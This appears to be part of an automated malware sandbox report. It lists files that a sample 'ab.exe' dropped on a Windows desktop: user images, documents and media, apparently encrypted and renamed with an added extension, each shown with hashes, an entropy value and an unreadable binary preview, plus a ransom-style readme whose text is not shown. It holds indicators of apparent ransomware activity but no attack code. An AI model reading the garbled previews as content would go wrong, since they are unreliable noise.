Preview:	Z......i..JW.NrPQ..5.l:.&w;....k.,...SaY7..}#..9C^.ar...Y."...J.9t...k.1....aN..%\|V>.....K.....(.....,....T...N}..1...n1.f......b.R......A.F;.aUUB..g.O4...4.7.Y. ..c...:.....,..>~.9.`9k13..Y..&.ZD....C.c4..l..-.5.5..OX.I.'1y3%7..s..S..........km...h.3.....J.]9{o^<+0=.Qf./U..(.n....Y.....z.O..@.JI.u....D..{:...4o..B.:S..(n..0..5.z...G...M3H%..........b....$.bK.+m.b{d....f.:w`...1......u...4..:Z..9c`.x. .+.O.O......u.H?....16...K.@F..1.D.....d.F.p2.o2.3..u...=:V.....W...z...'6..\.i.oK.....<".dj...tB.......Q...n....2-z..-M]..2.#.q8...[M...^..#....2.C......h.9.@`.<Hu..j.4b.G...4..9.]O4X..B~Ph.a0..HH..j...z#@.n..-:.L...... ..WR.S.qt!M..[.B..E].}..W0..Z..:.b0/GG.....0..o..}....1...p)X..C.;...v...Zu...D,s...f..1..J.R..'..Ei.'=..........*....e..P.2..-.4..B6.<.....;.........w. q..c.\|.4..(IP.W.RQ.?...d...;.w..W...:..`..}...Ux..X.=.dy.L.c.d...O...s.[~..T...y/..J...;.XP).........'....!%....t..Y...U....)m.z.s2...x..$..u.....;V)<.:..A...

C:\Users\user\Desktop\QNCYCDFIJJ.jpg.bCcBDeabea (copy) Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.980538899760363
Encrypted:	false
SSDEEP:	192:ZAE4/1zdV9XFMaEhv3ZorCLLH6Qvu9I6X2Zn+a9PyG/wuF2csvV+n:Zop4am/ZorC/HRvu9IWSnFyG/wun
MD5:	9CC5974F5685D94A4F42A3BCD8D17FCE
SHA1:	177F93B0C98EE538D2088DEC3ABA28F180545B5E
SHA-256:	3A2E4553302AD38E338B6E291F2ADD041E1AC5C59248AEFA1F2BEEDB44D444C5
SHA-512:	FDF7A1F89C847CB4AE155568ECC66D9515C7F7727C9F3E960DF7B45EFBD4F4F40D0AE4156DEC3B7F7C14FF9D558D460BE8CDB5E256A607AAA6B217362F0440AF
Malicious:	false
Preview:	Z......i..JW.NrPQ..5.l:.&w;....k.,...SaY7..}#..9C^.ar...Y."...J.9t...k.1....aN..%\|V>.....K.....(.....,....T...N}..1...n1.f......b.R......A.F;.aUUB..g.O4...4.7.Y. ..c...:.....,..>~.9.`9k13..Y..&.ZD....C.c4..l..-.5.5..OX.I.'1y3%7..s..S..........km...h.3.....J.]9{o^<+0=.Qf./U..(.n....Y.....z.O..@.JI.u....D..{:...4o..B.:S..(n..0..5.z...G...M3H%..........b....$.bK.+m.b{d....f.:w`...1......u...4..:Z..9c`.x. .+.O.O......u.H?....16...K.@F..1.D.....d.F.p2.o2.3..u...=:V.....W...z...'6..\.i.oK.....<".dj...tB.......Q...n....2-z..-M]..2.#.q8...[M...^..#....2.C......h.9.@`.<Hu..j.4b.G...4..9.]O4X..B~Ph.a0..HH..j...z#@.n..-:.L...... ..WR.S.qt!M..[.B..E].}..W0..Z..:.b0/GG.....0..o..}....1...p)X..C.;...v...Zu...D,s...f..1..J.R..'..Ei.'=..........*....e..P.2..-.4..B6.<.....;.........w. q..c.\|.4..(IP.W.RQ.?...d...;.w..W...:..`..}...Ux..X.=.dy.L.c.d...O...s.[~..T...y/..J...;.XP).........'....!%....t..Y...U....)m.z.s2...x..$..u.....;V)<.:..A...

C:\Users\user\Desktop\QNCYCDFIJJ\EFOYFBOLXA.jpg Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.975620479137032
Encrypted:	false
SSDEEP:	192:Nms5Q6dygYLULRtiMBW948Jz8fW1tUuBEQgxZUbV6AeWyQV+n:x5Q6sXLUL41Jwfqt94JWyp
MD5:	56FDCA0F8994852C676076FB15F105F0
SHA1:	5478462C34AE79FED8C1BC5B0AE1D4198C724FC6
SHA-256:	25F32C69D3D6CED7CEE19B942DBBE89DB2D541DAA799ACF6B551A7C835B3B8FF
SHA-512:	3388E84C382B62B1DA4EDB2593A52184A0616F6F2F90BB7078142A94E5BF2788F47C98C62D050B86FA705482F30F7381A43E00239E61E0833957ADDABF948F9E
Malicious:	true
Preview:	.CE..A.'..1.....L.1.]N.$.gu..n.{.:.7...!..0(..i..#.e...kO.5....5e..,v~...{...,Qbd/........h.A....j...J,...L+...oK!.K..b.5.a.S.......V....6:J.y...).#.p....0....Ji.r.(..?1\|.J.q2en.....j.@....\|..?-.5 ..#...R..4.7.^.".!....._.=J.mH..`....gM.E...T..xSSy.;/(.i....a..T.y.y..\6...#.s<h....9..m2..}..v(.ztM..<....1.Q.1..Q....R1...g-.?..gPm...mf.k...V9.b.P.\|.....u}9...W...x..r..M.%...A..j.Q.....ej..&.).5.._.l........P..=.;......K.a..a......Lk.\|.....+...8.:=v8.I.O....N...).q)......)&2..eH....C........Y=..vB&...DhY..G:.&?4..L\|.KAC..E.."(..K.0.....c(..;C!.q.$ZM.......f.@b..)#PN.l.a.B3....0.t.....q.x.+xbI$e:,6.1..2.S..._..6:.i.w....Y2S..cnG..R.a......R....rv..u.IbC5..].)..uJi.l.k...Pf.....>1..R.{#..W...!..[2'.........\.$.& /......T).y..".H............'..{. ....;......)..S.I..%A...p...&.\...+...xa.....V.?....A..Sq.B...D...L.....<^.1.}.v@qn......C/WU.;.Crl..q............A.g1{q...x.....6....+.}c(...N::....~...p.#@....c...$...Q..2..{O.~^.O.R.3..x).>!IArf

C:\Users\user\Desktop\QNCYCDFIJJ\EFOYFBOLXA.jpg.bCcBDeabea (copy) Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.975620479137032
Encrypted:	false
SSDEEP:	192:Nms5Q6dygYLULRtiMBW948Jz8fW1tUuBEQgxZUbV6AeWyQV+n:x5Q6sXLUL41Jwfqt94JWyp
MD5:	56FDCA0F8994852C676076FB15F105F0
SHA1:	5478462C34AE79FED8C1BC5B0AE1D4198C724FC6
SHA-256:	25F32C69D3D6CED7CEE19B942DBBE89DB2D541DAA799ACF6B551A7C835B3B8FF
SHA-512:	3388E84C382B62B1DA4EDB2593A52184A0616F6F2F90BB7078142A94E5BF2788F47C98C62D050B86FA705482F30F7381A43E00239E61E0833957ADDABF948F9E
Malicious:	false
Preview:	.CE..A.'..1.....L.1.]N.$.gu..n.{.:.7...!..0(..i..#.e...kO.5....5e..,v~...{...,Qbd/........h.A....j...J,...L+...oK!.K..b.5.a.S.......V....6:J.y...).#.p....0....Ji.r.(..?1\|.J.q2en.....j.@....\|..?-.5 ..#...R..4.7.^.".!....._.=J.mH..`....gM.E...T..xSSy.;/(.i....a..T.y.y..\6...#.s<h....9..m2..}..v(.ztM..<....1.Q.1..Q....R1...g-.?..gPm...mf.k...V9.b.P.\|.....u}9...W...x..r..M.%...A..j.Q.....ej..&.).5.._.l........P..=.;......K.a..a......Lk.\|.....+...8.:=v8.I.O....N...).q)......)&2..eH....C........Y=..vB&...DhY..G:.&?4..L\|.KAC..E.."(..K.0.....c(..;C!.q.$ZM.......f.@b..)#PN.l.a.B3....0.t.....q.x.+xbI$e:,6.1..2.S..._..6:.i.w....Y2S..cnG..R.a......R....rv..u.IbC5..].)..uJi.l.k...Pf.....>1..R.{#..W...!..[2'.........\.$.& /......T).y..".H............'..{. ....;......)..S.I..%A...p...&.\...+...xa.....V.?....A..Sq.B...D...L.....<^.1.}.v@qn......C/WU.;.Crl..q............A.g1{q...x.....6....+.}c(...N::....~...p.#@....c...$...Q..2..{O.~^.O.R.3..x).>!IArf

C:\Users\user\Desktop\QNCYCDFIJJ\PALRGUCVEH.png Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.978353269558998
Encrypted:	false
SSDEEP:	192:lIJYaHSWMiN6PrTjsOoEUNHu+UvuYTJFRZy+2arOV+n:CJYaHlMiIrsOohg+A1Zyw
MD5:	0DB5E91DC7F4D76BF8600F70451C2521
SHA1:	98C5EF5BA7E819D39D1736FFE97BAD948CFEBEA6
SHA-256:	3B275F33A89D9000E2CC28691DD344A03CA92577B488E2CA41D622A0058B4DDE
SHA-512:	AB55398EC9CC5D7A8BEAE202109229CE2AA37873C709B9D393B4CF9565033D28268C6237FD0421DF13FD734027BD71ABBB058BD7F03D1AAF0BD6971DF9C00E93
Malicious:	false
Preview:	..........DJ.f.E.Z<.T...p....!....z....U3...Jql.b ...66..7P.=......b.y=.2..R:u#.)...r....j..B........fZ..N.........}z...{..W...t.8\7.s..............z.#d...6.a.q....n...C..-...M .....~..R.$.......hl....\|.%...2..M..W3.v..r......=...n....".y&kD.b.w...v...nB.......Z'.KL..f..scw...x.F..[.....A......X..47R`.L..1.. .-...!A.Vu.Q.mJt.UN....,.. ...7...g..).......>J.l.l...x."....U..-:DL.>.l..^/.9...z'hL1..n...~\...C\(m.}.%Q...!..........s;U...I.........$..,...L.C.l.V.g\..h{..ug.7R.'.;..k}.=...#_.j.$w.aL.!...F?..@.r..V0....D._.Z..i....=..-.R.L./ T......W...k..i.E.....A..2...\|...g..hs..V..k.'....j.p5'..2.9....s.U.......<....k9..O...X;...B3...{k...zz.I.H....aDP.....z.(y.L-F...`k.l....@.O.3..3.b..y=9t.`...U..p...d]2..@~?.....wK...TT...;v..[o........I......vu..5i:c...1...z...vp...7.M...JujD.n)..N\|~5.6..U\|...~*....T.zY...\B.rQ1.\D3v.p!..gN.^....%,.RW..]v7t.U.+u.....\|8\|n.....nT.K.. .}..+I......Z....L..w.p.h.G.=j.8.b.W....I..%6....i....;.U.~...uU`.

C:\Users\user\Desktop\QNCYCDFIJJ\PALRGUCVEH.png.bCcBDeabea (copy) Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.978353269558998
Encrypted:	false
SSDEEP:	192:lIJYaHSWMiN6PrTjsOoEUNHu+UvuYTJFRZy+2arOV+n:CJYaHlMiIrsOohg+A1Zyw
MD5:	0DB5E91DC7F4D76BF8600F70451C2521
SHA1:	98C5EF5BA7E819D39D1736FFE97BAD948CFEBEA6
SHA-256:	3B275F33A89D9000E2CC28691DD344A03CA92577B488E2CA41D622A0058B4DDE
SHA-512:	AB55398EC9CC5D7A8BEAE202109229CE2AA37873C709B9D393B4CF9565033D28268C6237FD0421DF13FD734027BD71ABBB058BD7F03D1AAF0BD6971DF9C00E93
Malicious:	false
Preview:	..........DJ.f.E.Z<.T...p....!....z....U3...Jql.b ...66..7P.=......b.y=.2..R:u#.)...r....j..B........fZ..N.........}z...{..W...t.8\7.s..............z.#d...6.a.q....n...C..-...M .....~..R.$.......hl....\|.%...2..M..W3.v..r......=...n....".y&kD.b.w...v...nB.......Z'.KL..f..scw...x.F..[.....A......X..47R`.L..1.. .-...!A.Vu.Q.mJt.UN....,.. ...7...g..).......>J.l.l...x."....U..-:DL.>.l..^/.9...z'hL1..n...~\...C\(m.}.%Q...!..........s;U...I.........$..,...L.C.l.V.g\..h{..ug.7R.'.;..k}.=...#_.j.$w.aL.!...F?..@.r..V0....D._.Z..i....=..-.R.L./ T......W...k..i.E.....A..2...\|...g..hs..V..k.'....j.p5'..2.9....s.U.......<....k9..O...X;...B3...{k...zz.I.H....aDP.....z.(y.L-F...`k.l....@.O.3..3.b..y=9t.`...U..p...d]2..@~?.....wK...TT...;v..[o........I......vu..5i:c...1...z...vp...7.M...JujD.n)..N\|~5.6..U\|...~*....T.zY...\B.rQ1.\D3v.p!..gN.^....%,.RW..]v7t.U.+u.....\|8\|n.....nT.K.. .}..+I......Z....L..w.p.h.G.=j.8.b.W....I..%6....i....;.U.~...uU`.

C:\Users\user\Desktop\QNCYCDFIJJ\QNCYCDFIJJ.docx Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.975121053775242
Encrypted:	false
SSDEEP:	192:RwbPrGt4MpOUPYhwI/iI2Thy8+4+NJBHKB4nk8/3FgILIuv2SV+n:+jU/pOUg2grXJlKBUvFgIbi
MD5:	2D72C7C1572D9967D41331970844F005
SHA1:	864D2B658A51BE707EC40AFEC21C4D0FA452FEA1
SHA-256:	B3F9670BB1451A22903E30E801B2DAC1D247E4C972431BD0648DF2A3D23FB552
SHA-512:	48C0DB4EAEC79BE3E529586E5402FFD470A5CDE85A676E765194DC8FE75B38A9E05E99932AFF12550E1D2C794B82A9AEA5CD7AE178B25B741C3EBF52E8FFB6F0
Malicious:	true
Preview:	WM....._i...AO.T[......\.....5....n\}....;)[...T...eQ...;...)#......k..%..x...}...r.j...v.`...n.......xH.l.k..V....~...W.\|.gn#.t.k.$o.T...BB...X.p T.....\|_.....ji?.x.M...N=...u7.<....+v......5.@.E.PQ....-I....]>..t.............X.=.....Lq..4.G....;tN...R.....U..B.......op.8K2.2.g.ua.e.R.:......j9.^..y.8.)....vu?PL.T.x.x....../.?f6..9.....<.....%..Bp[tLF+....-3.5A...6..~..^R>....7B.u>#..bS...~ml..t.....W0_..x.2.2.............Q.m..97...%. oj.=...e.c.<T.Nd......-...gW.A.K..7.w...]Q.pKj..p..?.(........O...r!.z!b.i.]. .......>..}..lB....f..P3..z.p)Z[<.BR..z....L=....j....9_F..mh._Tp.h....\).......%.f.W!.2.........\|...B....1.~.'...F.pK...Wr....~2Z..[.h~S.....n.......A..{..5i.=..Ti.9..P.Z.F.a.N...-..F>.{.....T.b.zK>.&.Q..6g....Of%,<.~..H....[....$..I.,b.G....t.Y=...d.X..YFF..~ay.N....g......K..o^K<...O..v.3.g@...h.r.K.8.n~..LG.X.W....tF.c...).b..#.\...l.[..A.{&5K-sx..v.^.\|UT.lL.........4...4W..G..}z....[..$...+....G.{>....7.li...fGC...].?.

C:\Users\user\Desktop\QNCYCDFIJJ\QNCYCDFIJJ.docx.bCcBDeabea (copy) Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.975121053775242
Encrypted:	false
SSDEEP:	192:RwbPrGt4MpOUPYhwI/iI2Thy8+4+NJBHKB4nk8/3FgILIuv2SV+n:+jU/pOUg2grXJlKBUvFgIbi
MD5:	2D72C7C1572D9967D41331970844F005
SHA1:	864D2B658A51BE707EC40AFEC21C4D0FA452FEA1
SHA-256:	B3F9670BB1451A22903E30E801B2DAC1D247E4C972431BD0648DF2A3D23FB552
SHA-512:	48C0DB4EAEC79BE3E529586E5402FFD470A5CDE85A676E765194DC8FE75B38A9E05E99932AFF12550E1D2C794B82A9AEA5CD7AE178B25B741C3EBF52E8FFB6F0
Malicious:	false
Preview:	WM....._i...AO.T[......\.....5....n\}....;)[...T...eQ...;...)#......k..%..x...}...r.j...v.`...n.......xH.l.k..V....~...W.\|.gn#.t.k.$o.T...BB...X.p T.....\|_.....ji?.x.M...N=...u7.<....+v......5.@.E.PQ....-I....]>..t.............X.=.....Lq..4.G....;tN...R.....U..B.......op.8K2.2.g.ua.e.R.:......j9.^..y.8.)....vu?PL.T.x.x....../.?f6..9.....<.....%..Bp[tLF+....-3.5A...6..~..^R>....7B.u>#..bS...~ml..t.....W0_..x.2.2.............Q.m..97...%. oj.=...e.c.<T.Nd......-...gW.A.K..7.w...]Q.pKj..p..?.(........O...r!.z!b.i.]. .......>..}..lB....f..P3..z.p)Z[<.BR..z....L=....j....9_F..mh._Tp.h....\).......%.f.W!.2.........\|...B....1.~.'...F.pK...Wr....~2Z..[.h~S.....n.......A..{..5i.=..Ti.9..P.Z.F.a.N...-..F>.{.....T.b.zK>.&.Q..6g....Of%,<.~..H....[....$..I.,b.G....t.Y=...d.X..YFF..~ay.N....g......K..o^K<...O..v.3.g@...h.r.K.8.n~..LG.X.W....tF.c...).b..#.\...l.[..A.{&5K-sx..v.^.\|UT.lL.........4...4W..G..}z....[..$...+....G.{>....7.li...fGC...].?.

C:\Users\user\Desktop\QNCYCDFIJJ\SQSJKEBWDT.pdf Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.9769649874809625
Encrypted:	false
SSDEEP:	192:2gkXqYhAW7OPb78O8sTh44EIo02Wdj6Ex6NgOyn8NDM1TM0j84V+n:2gkaYn7O8nsl44/o0fCgZ8NDl
MD5:	F90BFD93626100A27EE9CB7895458A58
SHA1:	B1D9ECA7009646151EC1EB46F456BC0CD3B82BF4
SHA-256:	A74214BA0B242C0B0D3BE1ED8FF2342996868CEBEDFB856CF6A41A24981CD901
SHA-512:	A9534F08EE8249B8E3D02BBDB236A38F1BFD38D8767AA83904E54E4EC8239F454865EA9F192AB4AAC0BE8A5689E3BBBE9BDD9D7FDC3DC96E8FB9D39AC4AB920D
Malicious:	false
Preview:	X....C....V..38M0..CV.%t2......g............#..gs..5Z.........kF.Xg.e.B..:..`l..?.F...u...~..\|6.8..q.>Q..d...!.c6=F.Ee.YxA...:q.1oM#6.G..[.m..^z..\|.E...B.WM...sp. .7....'e&"..r.....yH...w?#S...@..X.e8..RZ...s\.......a7..2.G..xp.2.7N...E..$.~m.v(o0..-...H...J.>(6..d..Pd.,.8.M%..=.U.z...!....J.......@Q....&.0.s.;/...1:..T....2..G"M....H..'%&.ftV.G..y..'?R.j.&&8....3.pw..FF.2.x...X.9.........!.V.....c....i.%.D../\|[.mX.. .B....z...;7...@.{I.\.b{.EL....F....hlx@..j......v...S..(K..k.o.(....y2..".....{Y.8.-.,:....D.R...cH...MoL................E.x.GL1..l......(+.3.w-j..2.u\.od;.E...J).Uk.-#>w.5a......n..Q....g.7....!~..`.c;.O..+.Kq...g......xbE\|..X........c@k5.d.:.=W..r......H..8..)5.....qd..q..sz.j...V..M....pd3}.[I..j.-8KW....z..q3..........aoL.f.:].L.....K.:.n.r.s.m.4s?{P..A \6..Sir........fo)..c....*.......[..mF....>.>{.d..@...?.7_... ../......CTG..x:.-.=..._..1i ..<...m./\|o^..`6..c..5.it8.M......p...'Bn.B..a_..D{e&......k_Uo..I...q..@..

C:\Users\user\Desktop\QNCYCDFIJJ\SQSJKEBWDT.pdf.bCcBDeabea (copy) Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.9769649874809625
Encrypted:	false
SSDEEP:	192:2gkXqYhAW7OPb78O8sTh44EIo02Wdj6Ex6NgOyn8NDM1TM0j84V+n:2gkaYn7O8nsl44/o0fCgZ8NDl
MD5:	F90BFD93626100A27EE9CB7895458A58
SHA1:	B1D9ECA7009646151EC1EB46F456BC0CD3B82BF4
SHA-256:	A74214BA0B242C0B0D3BE1ED8FF2342996868CEBEDFB856CF6A41A24981CD901
SHA-512:	A9534F08EE8249B8E3D02BBDB236A38F1BFD38D8767AA83904E54E4EC8239F454865EA9F192AB4AAC0BE8A5689E3BBBE9BDD9D7FDC3DC96E8FB9D39AC4AB920D
Malicious:	false
Preview:	X....C....V..38M0..CV.%t2......g............#..gs..5Z.........kF.Xg.e.B..:..`l..?.F...u...~..\|6.8..q.>Q..d...!.c6=F.Ee.YxA...:q.1oM#6.G..[.m..^z..\|.E...B.WM...sp. .7....'e&"..r.....yH...w?#S...@..X.e8..RZ...s\.......a7..2.G..xp.2.7N...E..$.~m.v(o0..-...H...J.>(6..d..Pd.,.8.M%..=.U.z...!....J.......@Q....&.0.s.;/...1:..T....2..G"M....H..'%&.ftV.G..y..'?R.j.&&8....3.pw..FF.2.x...X.9.........!.V.....c....i.%.D../\|[.mX.. .B....z...;7...@.{I.\.b{.EL....F....hlx@..j......v...S..(K..k.o.(....y2..".....{Y.8.-.,:....D.R...cH...MoL................E.x.GL1..l......(+.3.w-j..2.u\.od;.E...J).Uk.-#>w.5a......n..Q....g.7....!~..`.c;.O..+.Kq...g......xbE\|..X........c@k5.d.:.=W..r......H..8..)5.....qd..q..sz.j...V..M....pd3}.[I..j.-8KW....z..q3..........aoL.f.:].L.....K.:.n.r.s.m.4s?{P..A \6..Sir........fo)..c....*.......[..mF....>.>{.d..@...?.7_... ../......CTG..x:.-.=..._..1i ..<...m./\|o^..`6..c..5.it8.M......p...'Bn.B..a_..D{e&......k_Uo..I...q..@..

C:\Users\user\Desktop\QNCYCDFIJJ\SUAVTZKNFL.xlsx Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.977333473305457
Encrypted:	false
SSDEEP:	192:3swzRNxhlxBJL1CniRWEkogQInb0ncftkfvNdV+n:3bRNxpBLKEOQIn4cFh
MD5:	96F0F1B578D8866C95A99933FF8CDC02
SHA1:	431317EC5043415D882E62EA531076A9F88F0793
SHA-256:	E7A01672AF61C667647B4F680BC1D9F9D63907DC0F172C5F5B479E923B00946D
SHA-512:	48F76F4C1D20A61A42060EF47DE3BEBE139AA77593820936B48BB3ECB9B634D866C61DE68686CC97C7928250F5042C20B25707EBDF775B2B134CA2EBC2293140
Malicious:	false
Preview:	NW..L..N?>i.$.F%....w..^....u...oU.]y.:......Xb.rI...[Q)&z.......3...K\|z..L.Xv.o.... =.......V..m.B~.8.j..G.Q_..1..f=..`...s.Y.r]...Mt..t...B..@L.......\....U?l...}.....9h..?.....T.U....<.q..:.XXL...c.B...C.....:...Y#{....Vr7.1\|....o.G.]E-.\.DP..i...1W...J...c f%.G..#.D!.......h..t.?i.S.UI..1....y.ksda.<...g....+.e...#.A.A.d.m.m+..B...N.x#...g%.Y.C..a..U...m...l..\|W0..,.nD..)...'.K..rt.....>..U.....H.}."..1.[Bb.{..],:.`D.9....a.YE...`~.....0..5......Ij....P..+.a@iV.Z.a.R..v\.q.).fo.y....t.3.tK...T5..J.......e.l ..!pe......N.3..G.Yp..=)....mR]Y..f1m.).U.cr..v..;.>2I`Ip8eg......E..<...3.I...m.....K}F8.-\|..9.G.5....+.b.q....`....=..xVZ; ......~o..,k....l...W.X.8`.,. V...d...J.l0e_......../...w.+........y.egx...5...J.\l.N.M..J.}...q..~4.$....1..MJ..H....{.....V@...\,1L.Pu\.d.>...V.....^~..I.r3..;!'.\|mb....R'.]/>..mF...SG-.....4q..<53G<3{.(.G..^..p.QGe..\.s.E....:j9a..'........._......1d.)..T.d...v.......F...(....l$Sh....)d.......

C:\Users\user\Desktop\QNCYCDFIJJ\SUAVTZKNFL.xlsx.bCcBDeabea (copy) Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.977333473305457
Encrypted:	false
SSDEEP:	192:3swzRNxhlxBJL1CniRWEkogQInb0ncftkfvNdV+n:3bRNxpBLKEOQIn4cFh
MD5:	96F0F1B578D8866C95A99933FF8CDC02
SHA1:	431317EC5043415D882E62EA531076A9F88F0793
SHA-256:	E7A01672AF61C667647B4F680BC1D9F9D63907DC0F172C5F5B479E923B00946D
SHA-512:	48F76F4C1D20A61A42060EF47DE3BEBE139AA77593820936B48BB3ECB9B634D866C61DE68686CC97C7928250F5042C20B25707EBDF775B2B134CA2EBC2293140
Malicious:	false
Preview:	NW..L..N?>i.$.F%....w..^....u...oU.]y.:......Xb.rI...[Q)&z.......3...K\|z..L.Xv.o.... =.......V..m.B~.8.j..G.Q_..1..f=..`...s.Y.r]...Mt..t...B..@L.......\....U?l...}.....9h..?.....T.U....<.q..:.XXL...c.B...C.....:...Y#{....Vr7.1\|....o.G.]E-.\.DP..i...1W...J...c f%.G..#.D!.......h..t.?i.S.UI..1....y.ksda.<...g....+.e...#.A.A.d.m.m+..B...N.x#...g%.Y.C..a..U...m...l..\|W0..,.nD..)...'.K..rt.....>..U.....H.}."..1.[Bb.{..],:.`D.9....a.YE...`~.....0..5......Ij....P..+.a@iV.Z.a.R..v\.q.).fo.y....t.3.tK...T5..J.......e.l ..!pe......N.3..G.Yp..=)....mR]Y..f1m.).U.cr..v..;.>2I`Ip8eg......E..<...3.I...m.....K}F8.-\|..9.G.5....+.b.q....`....=..xVZ; ......~o..,k....l...W.X.8`.,. V...d...J.l0e_......../...w.+........y.egx...5...J.\l.N.M..J.}...q..~4.$....1..MJ..H....{.....V@...\,1L.Pu\.d.>...V.....^~..I.r3..;!'.\|mb....R'.]/>..mF...SG-.....4q..<53G<3{.(.G..^..p.QGe..\.s.E....:j9a..'........._......1d.)..T.d...v.......F...(....l$Sh....)d.......

C:\Users\user\Desktop\QNCYCDFIJJ\ZGGKNSUKOP.mp3 Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.97385858418915
Encrypted:	false
SSDEEP:	192:xjnuFwDrCl9UCeF58cFUlqcmN2W7SNOlXbgweV+n:0wrClselZmN2DK0wL
MD5:	9DCEB64E009429AF62B508BDF1BB8D25
SHA1:	6B81D5024FDB1456DA785193DB339CB21515560B
SHA-256:	3039B3328ABB02A2EEA135565BB7C044665DBF9352A968F716CA46BC3B86DB0A
SHA-512:	CD077EC64325FA6FA1D35404FF2FB798052485E94F99E4A18846200FD2B99D76DB0B5492C510F491E415043614A3315F041D6B88941EEF2BB1BB83400ED53CDE
Malicious:	false
Preview:	y'..`.bX....T.<..)K:N....APO..p...#k.p...}....SJ..&...........7..................;.....d.5.3.q.{....Z]G[....l.^Q.._.I......8.........k/.~.Y.0../....Sd..>=..KH;.6...Fg..^r.N./GMDm ...Y1...,\|A`...X..<.H..Cm....X....i.o....[...:~..0..1.zf..Y..3"...'t...xl./@...zRI#.[}....A.F.. ..:Wy.....LP.+.s.w... w.z\..l.T..k......LPXG.....D.Lh)...k.^L.BZ.~.y.....m...1.n.I....K.....8I#......{.....G2..cB....Xe.9...C.........IR......Y...j. ?/..&. C.Z...n.ah.....G.J...1$...+.B.l...DI2oS...hY..J+./....G.H.......i.~R&...D2...P.m.]..I.<..ColXD.P....._p.U.!b&X[........G........urE.u..$..;-.~Q..U.N...k..9.\H....S"..O.r....M.n..!....YX.Jb..:xBU1.<.D.j.......Ac."VK...B..tx.;....p.....G........#.^.7...sI..........mha.+3..2..`h.......E`K.nb...p.......9..r.y.<..Y_`.h.[.z..Ud......k.J....h..S."my.....B...J^..[r.f..K..l.=K3. ......Np..jZ..>...l.s...O..O...$.I...{.z.ka.....Z..DbI.\|..s.)D.sd_...z.?.Ok?..Z...\d@y9)=.v&..%L.......yN....u.'*.K....vW].>..^....#+..

C:\Users\user\Desktop\QNCYCDFIJJ\ZGGKNSUKOP.mp3.bCcBDeabea (copy) Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.97385858418915
Encrypted:	false
SSDEEP:	192:xjnuFwDrCl9UCeF58cFUlqcmN2W7SNOlXbgweV+n:0wrClselZmN2DK0wL
MD5:	9DCEB64E009429AF62B508BDF1BB8D25
SHA1:	6B81D5024FDB1456DA785193DB339CB21515560B
SHA-256:	3039B3328ABB02A2EEA135565BB7C044665DBF9352A968F716CA46BC3B86DB0A
SHA-512:	CD077EC64325FA6FA1D35404FF2FB798052485E94F99E4A18846200FD2B99D76DB0B5492C510F491E415043614A3315F041D6B88941EEF2BB1BB83400ED53CDE
Malicious:	false
Preview:	y'..`.bX....T.<..)K:N....APO..p...#k.p...}....SJ..&...........7..................;.....d.5.3.q.{....Z]G[....l.^Q.._.I......8.........k/.~.Y.0../....Sd..>=..KH;.6...Fg..^r.N./GMDm ...Y1...,\|A`...X..<.H..Cm....X....i.o....[...:~..0..1.zf..Y..3"...'t...xl./@...zRI#.[}....A.F.. ..:Wy.....LP.+.s.w... w.z\..l.T..k......LPXG.....D.Lh)...k.^L.BZ.~.y.....m...1.n.I....K.....8I#......{.....G2..cB....Xe.9...C.........IR......Y...j. ?/..&. C.Z...n.ah.....G.J...1$...+.B.l...DI2oS...hY..J+./....G.H.......i.~R&...D2...P.m.]..I.<..ColXD.P....._p.U.!b&X[........G........urE.u..$..;-.~Q..U.N...k..9.\H....S"..O.r....M.n..!....YX.Jb..:xBU1.<.D.j.......Ac."VK...B..tx.;....p.....G........#.^.7...sI..........mha.+3..2..`h.......E`K.nb...p.......9..r.y.<..Y_`.h.[.z..Ud......k.J....h..S."my.....B...J^..[r.f..K..l.=K3. ......Np..jZ..>...l.s...O..O...$.I...{.z.ka.....Z..DbI.\|..s.)D.sd_...z.?.Ok?..Z...\d@y9)=.v&..%L.......yN....u.'*.K....vW].>..^....#+..

C:\Users\user\Desktop\QNCYCDFIJJ\uCLrcwQ_readme_.txt Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	ASCII text, with very long lines, with CRLF, CR, LF line terminators
Category:	dropped
Size (bytes):	3775
Entropy (8bit):	5.733902755295598
Encrypted:	false
SSDEEP:	48:L9k0ZzV7L/vNbXGZULVDgUp4qNiiE6bm1c0rfWejhAe/YAliM3PXnLHrYxgkH69/:L95zhLNbXGZUe7Ka6pU6i9fLrvE69USz
MD5:	48E5A2612CDA2F13A8F5805C4729B202
SHA1:	E1C2C4BF2573F95BD36F04524D97C782D6BED687
SHA-256:	1B7D3016E5D63665C14C4F32119FCD1DFC6E523418BF498545BD5F2B6DD61F4C
SHA-512:	CE6F36F42414951E290A6E84F81A8A96B3200B56385ACCF06EA1DE63B68695A48F45D5BC5F926E02774B107A933A8656B77381D23829DD0FA2B764C8CF657FB3
Malicious:	false
